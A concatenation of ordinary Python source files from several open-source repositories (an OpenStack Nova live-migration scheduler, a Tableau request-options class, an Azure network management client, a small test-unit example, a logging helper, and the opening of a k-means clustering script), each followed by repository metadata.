# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler base class that all Schedulers should inherit from
"""
import datetime
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova import rpc
from nova import utils
from nova.compute import power_state
from nova.compute import vm_states
from nova.api.ec2 import ec2utils
FLAGS = flags.FLAGS
flags.DEFINE_integer('service_down_time', 60,
'maximum time since last checkin for up service')
flags.DECLARE('instances_path', 'nova.compute.manager')
class NoValidHost(exception.Error):
"""There is no valid host for the command."""
pass
class WillNotSchedule(exception.Error):
"""The specified host is not up or doesn't exist."""
pass
class Scheduler(object):
"""The base class that all Scheduler clases should inherit from."""
def __init__(self):
self.zone_manager = None
def set_zone_manager(self, zone_manager):
"""Called by the Scheduler Service to supply a ZoneManager."""
self.zone_manager = zone_manager
@staticmethod
def service_is_up(service):
"""Check whether a service is up based on last heartbeat."""
last_heartbeat = service['updated_at'] or service['created_at']
# Timestamps in DB are UTC.
elapsed = utils.utcnow() - last_heartbeat
return elapsed < datetime.timedelta(seconds=FLAGS.service_down_time)
def hosts_up(self, context, topic):
"""Return the list of hosts that have a running service for topic."""
services = db.service_get_all_by_topic(context, topic)
return [service.host
for service in services
if self.service_is_up(service)]
def schedule(self, context, topic, *_args, **_kwargs):
"""Must override at least this method for scheduler to work."""
raise NotImplementedError(_("Must implement a fallback schedule"))
def schedule_live_migration(self, context, instance_id, dest,
block_migration=False):
"""Live migration scheduling method.
:param context:
:param instance_id:
:param dest: destination host
:return:
            The host where the instance is currently running.
            The scheduler then sends the request to that host.
"""
# Whether instance exists and is running.
instance_ref = db.instance_get(context, instance_id)
# Checking instance.
self._live_migration_src_check(context, instance_ref)
# Checking destination host.
self._live_migration_dest_check(context, instance_ref,
dest, block_migration)
# Common checking.
self._live_migration_common_check(context, instance_ref,
dest, block_migration)
# Changing instance_state.
values = {"vm_state": vm_states.MIGRATING}
db.instance_update(context, instance_id, values)
# Changing volume state
for volume_ref in instance_ref['volumes']:
db.volume_update(context,
volume_ref['id'],
{'status': 'migrating'})
# Return value is necessary to send request to src
# Check _schedule() in detail.
src = instance_ref['host']
return src
def _live_migration_src_check(self, context, instance_ref):
"""Live migration check routine (for src host).
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
"""
# Checking instance is running.
if instance_ref['power_state'] != power_state.RUNNING:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
raise exception.InstanceNotRunning(instance_id=instance_id)
        # Checking that the volume node is running when any volumes are mounted
# to the instance.
if len(instance_ref['volumes']) != 0:
services = db.service_get_all_by_topic(context, 'volume')
if len(services) < 1 or not self.service_is_up(services[0]):
raise exception.VolumeServiceUnavailable()
        # Checking that the src host exists and is a compute node
src = instance_ref['host']
services = db.service_get_all_compute_by_host(context, src)
# Checking src host is alive.
if not self.service_is_up(services[0]):
raise exception.ComputeServiceUnavailable(host=src)
def _live_migration_dest_check(self, context, instance_ref, dest,
block_migration):
"""Live migration check routine (for destination host).
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
        # Checking that dest exists and is a compute node.
dservice_refs = db.service_get_all_compute_by_host(context, dest)
dservice_ref = dservice_refs[0]
# Checking dest host is alive.
if not self.service_is_up(dservice_ref):
raise exception.ComputeServiceUnavailable(host=dest)
        # Checking that the host where the instance is running
        # and dest are not the same.
src = instance_ref['host']
if dest == src:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
raise exception.UnableToMigrateToSelf(instance_id=instance_id,
host=dest)
        # Checking the dest host still has enough capacity.
self.assert_compute_node_has_enough_resources(context,
instance_ref,
dest,
block_migration)
def _live_migration_common_check(self, context, instance_ref, dest,
block_migration):
"""Live migration common check routine.
        The checks below follow
http://wiki.libvirt.org/page/TodoPreMigrationChecks
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
        :param block_migration: if True, check for block migration.
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
try:
self.mounted_on_same_shared_storage(context, instance_ref, dest)
if block_migration:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=dest)
except exception.FileNotFound:
if not block_migration:
src = instance_ref['host']
ipath = FLAGS.instances_path
logging.error(_("Cannot confirm tmpfile at %(ipath)s is on "
"same shared storage between %(src)s "
"and %(dest)s.") % locals())
raise
# Checking dest exists.
dservice_refs = db.service_get_all_compute_by_host(context, dest)
dservice_ref = dservice_refs[0]['compute_node'][0]
        # Checking that the original host (where the instance was launched) exists.
try:
oservice_refs = db.service_get_all_compute_by_host(context,
instance_ref['launched_on'])
except exception.NotFound:
raise exception.SourceHostUnavailable()
oservice_ref = oservice_refs[0]['compute_node'][0]
# Checking hypervisor is same.
orig_hypervisor = oservice_ref['hypervisor_type']
dest_hypervisor = dservice_ref['hypervisor_type']
if orig_hypervisor != dest_hypervisor:
raise exception.InvalidHypervisorType()
        # Checking hypervisor version.
orig_hypervisor = oservice_ref['hypervisor_version']
dest_hypervisor = dservice_ref['hypervisor_version']
if orig_hypervisor > dest_hypervisor:
raise exception.DestinationHypervisorTooOld()
# Checking cpuinfo.
try:
rpc.call(context,
db.queue_get_for(context, FLAGS.compute_topic, dest),
{"method": 'compare_cpu',
"args": {'cpu_info': oservice_ref['cpu_info']}})
except rpc.RemoteError:
src = instance_ref['host']
logging.exception(_("host %(dest)s is not compatible with "
"original host %(src)s.") % locals())
raise
def assert_compute_node_has_enough_resources(self, context, instance_ref,
dest, block_migration):
"""Checks if destination host has enough resource for live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
:param block_migration: if True, disk checking has been done
"""
self.assert_compute_node_has_enough_memory(context, instance_ref, dest)
if not block_migration:
return
self.assert_compute_node_has_enough_disk(context, instance_ref, dest)
def assert_compute_node_has_enough_memory(self, context,
instance_ref, dest):
"""Checks if destination host has enough memory for live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
        # Getting total available memory of the host
        avail = self._get_compute_info(context, dest, 'memory_mb')
        # Getting total used memory of the host
        # It should be the sum of the memory assigned to each instance (the
        # maximum value), because overcommitting is risky.
used = 0
instance_refs = db.instance_get_all_by_host(context, dest)
used_list = [i['memory_mb'] for i in instance_refs]
if used_list:
used = reduce(lambda x, y: x + y, used_list)
mem_inst = instance_ref['memory_mb']
avail = avail - used
if avail <= mem_inst:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
reason = _("Unable to migrate %(instance_id)s to %(dest)s: "
"Lack of memory(host:%(avail)s <= "
"instance:%(mem_inst)s)")
raise exception.MigrationError(reason=reason % locals())
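    # Worked example of the memory check above (numbers are illustrative, not
    # from any real deployment): if the dest host reports 2048 MB, instances
    # already placed there total 1536 MB, and the migrating instance needs
    # 512 MB, then avail = 2048 - 1536 = 512 and the migration is rejected
    # because avail <= mem_inst.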
def assert_compute_node_has_enough_disk(self, context,
instance_ref, dest):
"""Checks if destination host has enough disk for block migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
        # Getting total available disk of the host
        avail = self._get_compute_info(context, dest, 'local_gb')
        # Getting total used disk of the host
        # It should be the sum of the disk assigned to each instance (the
        # maximum value), because overcommitting is risky.
used = 0
instance_refs = db.instance_get_all_by_host(context, dest)
used_list = [i['local_gb'] for i in instance_refs]
if used_list:
used = reduce(lambda x, y: x + y, used_list)
disk_inst = instance_ref['local_gb']
avail = avail - used
if avail <= disk_inst:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
reason = _("Unable to migrate %(instance_id)s to %(dest)s: "
"Lack of disk(host:%(avail)s "
"<= instance:%(disk_inst)s)")
raise exception.MigrationError(reason=reason % locals())
def _get_compute_info(self, context, host, key):
"""get compute node's infomation specified by key
:param context: security context
:param host: hostname(must be compute node)
:param key: column name of compute_nodes
:return: value specified by key
"""
compute_node_ref = db.service_get_all_compute_by_host(context, host)
compute_node_ref = compute_node_ref[0]['compute_node'][0]
return compute_node_ref[key]
def mounted_on_same_shared_storage(self, context, instance_ref, dest):
"""Check if the src and dest host mount same shared storage.
At first, dest host creates temp file, and src host can see
it if they mounts same shared storage. Then src host erase it.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
src = instance_ref['host']
dst_t = db.queue_get_for(context, FLAGS.compute_topic, dest)
src_t = db.queue_get_for(context, FLAGS.compute_topic, src)
try:
# create tmpfile at dest host
filename = rpc.call(context, dst_t,
{"method": 'create_shared_storage_test_file'})
            # make sure it exists at the src host.
ret = rpc.call(context, src_t,
{"method": 'check_shared_storage_test_file',
"args": {'filename': filename}})
if not ret:
raise exception.FileNotFound(file_path=filename)
except exception.FileNotFound:
raise
finally:
rpc.call(context, dst_t,
{"method": 'cleanup_shared_storage_test_file',
"args": {'filename': filename}})
| nii-cloud/dodai-compute | nova/scheduler/driver.py | Python | apache-2.0 | 14,688 |
class RequestOptions(object):
class Operator:
Equals = 'eq'
GreaterThan = 'gt'
GreaterThanOrEqual = 'gte'
LessThan = 'lt'
LessThanOrEqual = 'lte'
In = 'in'
class Field:
CreatedAt = 'createdAt'
LastLogin = 'lastLogin'
Name = 'name'
OwnerName = 'ownerName'
SiteRole = 'siteRole'
Tags = 'tags'
UpdatedAt = 'updatedAt'
class Direction:
Desc = 'desc'
Asc = 'asc'
def __init__(self, pagenumber=1, pagesize=100):
self.pagenumber = pagenumber
self.pagesize = pagesize
self.sort = set()
self.filter = set()
def page_size(self, page_size):
self.pagesize = page_size
return self
def page_number(self, page_number):
self.pagenumber = page_number
return self
def apply_query_params(self, url):
params = []
        # check the stored values, not the builder methods of the same name
        # (a bound method is always truthy, which would defeat the check)
        if self.pagenumber:
            params.append('pageNumber={0}'.format(self.pagenumber))
        if self.pagesize:
            params.append('pageSize={0}'.format(self.pagesize))
if len(self.sort) > 0:
params.append('sort={}'.format(','.join(str(sort_item) for sort_item in self.sort)))
if len(self.filter) > 0:
params.append('filter={}'.format(','.join(str(filter_item) for filter_item in self.filter)))
return "{0}?{1}".format(url, '&'.join(params))
| Talvalin/server-client-python | tableauserverclient/server/request_options.py | Python | mit | 1,429 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.mgmt.core import ARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Optional
from azure.core.credentials import TokenCredential
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from ._configuration import NetworkManagementClientConfiguration
from .operations import AzureFirewallsOperations
from .operations import ApplicationGatewaysOperations
from .operations import ApplicationSecurityGroupsOperations
from .operations import NetworkManagementClientOperationsMixin
from .operations import DdosProtectionPlansOperations
from .operations import AvailableEndpointServicesOperations
from .operations import ExpressRouteCircuitAuthorizationsOperations
from .operations import ExpressRouteCircuitPeeringsOperations
from .operations import ExpressRouteCircuitConnectionsOperations
from .operations import ExpressRouteCircuitsOperations
from .operations import ExpressRouteServiceProvidersOperations
from .operations import ExpressRouteCrossConnectionsOperations
from .operations import ExpressRouteCrossConnectionPeeringsOperations
from .operations import LoadBalancersOperations
from .operations import LoadBalancerBackendAddressPoolsOperations
from .operations import LoadBalancerFrontendIPConfigurationsOperations
from .operations import InboundNatRulesOperations
from .operations import LoadBalancerLoadBalancingRulesOperations
from .operations import LoadBalancerNetworkInterfacesOperations
from .operations import LoadBalancerProbesOperations
from .operations import NetworkInterfacesOperations
from .operations import NetworkInterfaceIPConfigurationsOperations
from .operations import NetworkInterfaceLoadBalancersOperations
from .operations import NetworkSecurityGroupsOperations
from .operations import SecurityRulesOperations
from .operations import DefaultSecurityRulesOperations
from .operations import NetworkWatchersOperations
from .operations import PacketCapturesOperations
from .operations import ConnectionMonitorsOperations
from .operations import Operations
from .operations import PublicIPAddressesOperations
from .operations import PublicIPPrefixesOperations
from .operations import RouteFiltersOperations
from .operations import RouteFilterRulesOperations
from .operations import RouteTablesOperations
from .operations import RoutesOperations
from .operations import BgpServiceCommunitiesOperations
from .operations import UsagesOperations
from .operations import VirtualNetworksOperations
from .operations import SubnetsOperations
from .operations import VirtualNetworkPeeringsOperations
from .operations import VirtualNetworkGatewaysOperations
from .operations import VirtualNetworkGatewayConnectionsOperations
from .operations import LocalNetworkGatewaysOperations
from .operations import VirtualWANsOperations
from .operations import VpnSitesOperations
from .operations import VpnSitesConfigurationOperations
from .operations import VirtualHubsOperations
from .operations import HubVirtualNetworkConnectionsOperations
from .operations import VpnGatewaysOperations
from .operations import VpnConnectionsOperations
from .operations import ServiceEndpointPoliciesOperations
from .operations import ServiceEndpointPolicyDefinitionsOperations
from . import models
class NetworkManagementClient(NetworkManagementClientOperationsMixin):
"""Network Client.
:ivar azure_firewalls: AzureFirewallsOperations operations
:vartype azure_firewalls: azure.mgmt.network.v2018_07_01.operations.AzureFirewallsOperations
:ivar application_gateways: ApplicationGatewaysOperations operations
:vartype application_gateways: azure.mgmt.network.v2018_07_01.operations.ApplicationGatewaysOperations
:ivar application_security_groups: ApplicationSecurityGroupsOperations operations
:vartype application_security_groups: azure.mgmt.network.v2018_07_01.operations.ApplicationSecurityGroupsOperations
:ivar ddos_protection_plans: DdosProtectionPlansOperations operations
:vartype ddos_protection_plans: azure.mgmt.network.v2018_07_01.operations.DdosProtectionPlansOperations
:ivar available_endpoint_services: AvailableEndpointServicesOperations operations
:vartype available_endpoint_services: azure.mgmt.network.v2018_07_01.operations.AvailableEndpointServicesOperations
:ivar express_route_circuit_authorizations: ExpressRouteCircuitAuthorizationsOperations operations
:vartype express_route_circuit_authorizations: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitAuthorizationsOperations
:ivar express_route_circuit_peerings: ExpressRouteCircuitPeeringsOperations operations
:vartype express_route_circuit_peerings: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitPeeringsOperations
:ivar express_route_circuit_connections: ExpressRouteCircuitConnectionsOperations operations
:vartype express_route_circuit_connections: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitConnectionsOperations
:ivar express_route_circuits: ExpressRouteCircuitsOperations operations
:vartype express_route_circuits: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitsOperations
:ivar express_route_service_providers: ExpressRouteServiceProvidersOperations operations
:vartype express_route_service_providers: azure.mgmt.network.v2018_07_01.operations.ExpressRouteServiceProvidersOperations
:ivar express_route_cross_connections: ExpressRouteCrossConnectionsOperations operations
:vartype express_route_cross_connections: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCrossConnectionsOperations
:ivar express_route_cross_connection_peerings: ExpressRouteCrossConnectionPeeringsOperations operations
:vartype express_route_cross_connection_peerings: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCrossConnectionPeeringsOperations
:ivar load_balancers: LoadBalancersOperations operations
:vartype load_balancers: azure.mgmt.network.v2018_07_01.operations.LoadBalancersOperations
:ivar load_balancer_backend_address_pools: LoadBalancerBackendAddressPoolsOperations operations
:vartype load_balancer_backend_address_pools: azure.mgmt.network.v2018_07_01.operations.LoadBalancerBackendAddressPoolsOperations
:ivar load_balancer_frontend_ip_configurations: LoadBalancerFrontendIPConfigurationsOperations operations
:vartype load_balancer_frontend_ip_configurations: azure.mgmt.network.v2018_07_01.operations.LoadBalancerFrontendIPConfigurationsOperations
:ivar inbound_nat_rules: InboundNatRulesOperations operations
:vartype inbound_nat_rules: azure.mgmt.network.v2018_07_01.operations.InboundNatRulesOperations
:ivar load_balancer_load_balancing_rules: LoadBalancerLoadBalancingRulesOperations operations
:vartype load_balancer_load_balancing_rules: azure.mgmt.network.v2018_07_01.operations.LoadBalancerLoadBalancingRulesOperations
:ivar load_balancer_network_interfaces: LoadBalancerNetworkInterfacesOperations operations
:vartype load_balancer_network_interfaces: azure.mgmt.network.v2018_07_01.operations.LoadBalancerNetworkInterfacesOperations
:ivar load_balancer_probes: LoadBalancerProbesOperations operations
:vartype load_balancer_probes: azure.mgmt.network.v2018_07_01.operations.LoadBalancerProbesOperations
:ivar network_interfaces: NetworkInterfacesOperations operations
:vartype network_interfaces: azure.mgmt.network.v2018_07_01.operations.NetworkInterfacesOperations
:ivar network_interface_ip_configurations: NetworkInterfaceIPConfigurationsOperations operations
:vartype network_interface_ip_configurations: azure.mgmt.network.v2018_07_01.operations.NetworkInterfaceIPConfigurationsOperations
:ivar network_interface_load_balancers: NetworkInterfaceLoadBalancersOperations operations
:vartype network_interface_load_balancers: azure.mgmt.network.v2018_07_01.operations.NetworkInterfaceLoadBalancersOperations
:ivar network_security_groups: NetworkSecurityGroupsOperations operations
:vartype network_security_groups: azure.mgmt.network.v2018_07_01.operations.NetworkSecurityGroupsOperations
:ivar security_rules: SecurityRulesOperations operations
:vartype security_rules: azure.mgmt.network.v2018_07_01.operations.SecurityRulesOperations
:ivar default_security_rules: DefaultSecurityRulesOperations operations
:vartype default_security_rules: azure.mgmt.network.v2018_07_01.operations.DefaultSecurityRulesOperations
:ivar network_watchers: NetworkWatchersOperations operations
:vartype network_watchers: azure.mgmt.network.v2018_07_01.operations.NetworkWatchersOperations
:ivar packet_captures: PacketCapturesOperations operations
:vartype packet_captures: azure.mgmt.network.v2018_07_01.operations.PacketCapturesOperations
:ivar connection_monitors: ConnectionMonitorsOperations operations
:vartype connection_monitors: azure.mgmt.network.v2018_07_01.operations.ConnectionMonitorsOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.network.v2018_07_01.operations.Operations
:ivar public_ip_addresses: PublicIPAddressesOperations operations
:vartype public_ip_addresses: azure.mgmt.network.v2018_07_01.operations.PublicIPAddressesOperations
:ivar public_ip_prefixes: PublicIPPrefixesOperations operations
:vartype public_ip_prefixes: azure.mgmt.network.v2018_07_01.operations.PublicIPPrefixesOperations
:ivar route_filters: RouteFiltersOperations operations
:vartype route_filters: azure.mgmt.network.v2018_07_01.operations.RouteFiltersOperations
:ivar route_filter_rules: RouteFilterRulesOperations operations
:vartype route_filter_rules: azure.mgmt.network.v2018_07_01.operations.RouteFilterRulesOperations
:ivar route_tables: RouteTablesOperations operations
:vartype route_tables: azure.mgmt.network.v2018_07_01.operations.RouteTablesOperations
:ivar routes: RoutesOperations operations
:vartype routes: azure.mgmt.network.v2018_07_01.operations.RoutesOperations
:ivar bgp_service_communities: BgpServiceCommunitiesOperations operations
:vartype bgp_service_communities: azure.mgmt.network.v2018_07_01.operations.BgpServiceCommunitiesOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.network.v2018_07_01.operations.UsagesOperations
:ivar virtual_networks: VirtualNetworksOperations operations
:vartype virtual_networks: azure.mgmt.network.v2018_07_01.operations.VirtualNetworksOperations
:ivar subnets: SubnetsOperations operations
:vartype subnets: azure.mgmt.network.v2018_07_01.operations.SubnetsOperations
:ivar virtual_network_peerings: VirtualNetworkPeeringsOperations operations
:vartype virtual_network_peerings: azure.mgmt.network.v2018_07_01.operations.VirtualNetworkPeeringsOperations
:ivar virtual_network_gateways: VirtualNetworkGatewaysOperations operations
:vartype virtual_network_gateways: azure.mgmt.network.v2018_07_01.operations.VirtualNetworkGatewaysOperations
:ivar virtual_network_gateway_connections: VirtualNetworkGatewayConnectionsOperations operations
:vartype virtual_network_gateway_connections: azure.mgmt.network.v2018_07_01.operations.VirtualNetworkGatewayConnectionsOperations
:ivar local_network_gateways: LocalNetworkGatewaysOperations operations
:vartype local_network_gateways: azure.mgmt.network.v2018_07_01.operations.LocalNetworkGatewaysOperations
:ivar virtual_wans: VirtualWANsOperations operations
:vartype virtual_wans: azure.mgmt.network.v2018_07_01.operations.VirtualWANsOperations
:ivar vpn_sites: VpnSitesOperations operations
:vartype vpn_sites: azure.mgmt.network.v2018_07_01.operations.VpnSitesOperations
:ivar vpn_sites_configuration: VpnSitesConfigurationOperations operations
:vartype vpn_sites_configuration: azure.mgmt.network.v2018_07_01.operations.VpnSitesConfigurationOperations
:ivar virtual_hubs: VirtualHubsOperations operations
:vartype virtual_hubs: azure.mgmt.network.v2018_07_01.operations.VirtualHubsOperations
:ivar hub_virtual_network_connections: HubVirtualNetworkConnectionsOperations operations
:vartype hub_virtual_network_connections: azure.mgmt.network.v2018_07_01.operations.HubVirtualNetworkConnectionsOperations
:ivar vpn_gateways: VpnGatewaysOperations operations
:vartype vpn_gateways: azure.mgmt.network.v2018_07_01.operations.VpnGatewaysOperations
:ivar vpn_connections: VpnConnectionsOperations operations
:vartype vpn_connections: azure.mgmt.network.v2018_07_01.operations.VpnConnectionsOperations
:ivar service_endpoint_policies: ServiceEndpointPoliciesOperations operations
:vartype service_endpoint_policies: azure.mgmt.network.v2018_07_01.operations.ServiceEndpointPoliciesOperations
:ivar service_endpoint_policy_definitions: ServiceEndpointPolicyDefinitionsOperations operations
:vartype service_endpoint_policy_definitions: azure.mgmt.network.v2018_07_01.operations.ServiceEndpointPolicyDefinitionsOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: The subscription credentials which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential, # type: "TokenCredential"
subscription_id, # type: str
base_url=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
if not base_url:
base_url = 'https://management.azure.com'
self._config = NetworkManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.azure_firewalls = AzureFirewallsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.application_gateways = ApplicationGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.application_security_groups = ApplicationSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.ddos_protection_plans = DdosProtectionPlansOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_endpoint_services = AvailableEndpointServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_authorizations = ExpressRouteCircuitAuthorizationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_peerings = ExpressRouteCircuitPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_connections = ExpressRouteCircuitConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuits = ExpressRouteCircuitsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_service_providers = ExpressRouteServiceProvidersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connections = ExpressRouteCrossConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connection_peerings = ExpressRouteCrossConnectionPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancers = LoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_backend_address_pools = LoadBalancerBackendAddressPoolsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_frontend_ip_configurations = LoadBalancerFrontendIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.inbound_nat_rules = InboundNatRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_load_balancing_rules = LoadBalancerLoadBalancingRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_network_interfaces = LoadBalancerNetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_probes = LoadBalancerProbesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interfaces = NetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_ip_configurations = NetworkInterfaceIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_load_balancers = NetworkInterfaceLoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_security_groups = NetworkSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.security_rules = SecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.default_security_rules = DefaultSecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_watchers = NetworkWatchersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.packet_captures = PacketCapturesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.connection_monitors = ConnectionMonitorsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_addresses = PublicIPAddressesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_prefixes = PublicIPPrefixesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filters = RouteFiltersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filter_rules = RouteFilterRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_tables = RouteTablesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.routes = RoutesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.bgp_service_communities = BgpServiceCommunitiesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_networks = VirtualNetworksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.subnets = SubnetsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_peerings = VirtualNetworkPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateways = VirtualNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateway_connections = VirtualNetworkGatewayConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.local_network_gateways = LocalNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_wans = VirtualWANsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites = VpnSitesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites_configuration = VpnSitesConfigurationOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_hubs = VirtualHubsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.hub_virtual_network_connections = HubVirtualNetworkConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_gateways = VpnGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_connections = VpnConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policies = ServiceEndpointPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policy_definitions = ServiceEndpointPolicyDefinitionsOperations(
self._client, self._config, self._serialize, self._deserialize)
def _send_request(self, http_request, **kwargs):
# type: (HttpRequest, Any) -> HttpResponse
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.HttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
def close(self):
# type: () -> None
self._client.close()
def __enter__(self):
# type: () -> NetworkManagementClient
self._client.__enter__()
return self
def __exit__(self, *exc_details):
# type: (Any) -> None
self._client.__exit__(*exc_details)
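# Typical construction, shown only as a sketch (assumes the azure-identity
# package is available; the subscription id below is a placeholder):
#   from azure.identity import DefaultAzureCredential
#   client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
#   for vnet in client.virtual_networks.list_all():
#       print(vnet.name)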
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_07_01/_network_management_client.py | Python | mit | 23,821 |
from test_unit_module import test_unit
class Usage(test_unit):
def __init__(self):
pass
def test_case_0(self):
"""
Example of a passing test case.
"""
actual = 8 # 3+5
expected = 8
self.assert_op(actual,expected,0) # Actual result, Expected result, test case id or identifier(not optional), HINT (Optional)
def test_case_1(self):
"""
Example of a failing test case without a hint.
"""
actual = 9 # 3+5 !=9
expected = 8
self.assert_op(actual,expected,1)
def test_case_2(self):
"""
Example of a failing test case with a hint
"""
actual = 9 # 3+5 !=9
expected = 8
self.assert_op(actual,expected, 2,"Addition is not done right.")
# NOTE : There is a third parameter. It is an optional parameter and will be used a hint ONLY IF the test case FAILS.
def main():
suite = Usage()
suite.run_tests()
if __name__ == "__main__":
main()
| budhiraja/Test-Unit | usage_test_unit.py | Python | mit | 890 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import structlog
def get_saml_logger():
"""
Get a logger named `saml2idp` after the main package.
"""
return structlog.get_logger('saml2idp')
| mobify/dj-saml-idp | saml2idp/logging.py | Python | mit | 257 |
#!/usr/bin/python3
# Filename: k_means_cluster.py
"""
A machine learning algorithm for K-means clustering.
Date: 24th March, 2015 pm
"""
__author__ = "Anthony Wanjohi"
__version__ = "1.0.0"
import random, fractions
def euclidean_distance(point, centroid):
'''Returns the euclidean distance between two points'''
assert type(point) is tuple
assert type(centroid) is tuple
#x and y values for the point and the centroid
point_x, point_y = point
centroid_x, centroid_y = centroid
#get euclidean distance
